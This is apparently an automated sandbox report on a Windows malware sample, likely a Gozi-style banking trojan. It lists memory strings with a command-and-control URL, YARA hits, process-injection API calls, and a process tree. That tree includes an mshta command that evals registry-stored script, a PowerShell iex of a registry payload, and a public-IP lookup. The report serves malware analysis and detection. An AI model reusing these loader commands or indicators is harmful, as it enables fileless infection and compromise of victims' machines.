Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P |
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/t |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m5 |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57666 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E58055 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558F7F5 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A8F7 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580FBD memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E8B90 NtMapViewOfSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E5B80 NtCreateSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1950 NtWriteVirtualMemory, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1950 NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C5B80 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C8B90 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000BFCA8 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B4580 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |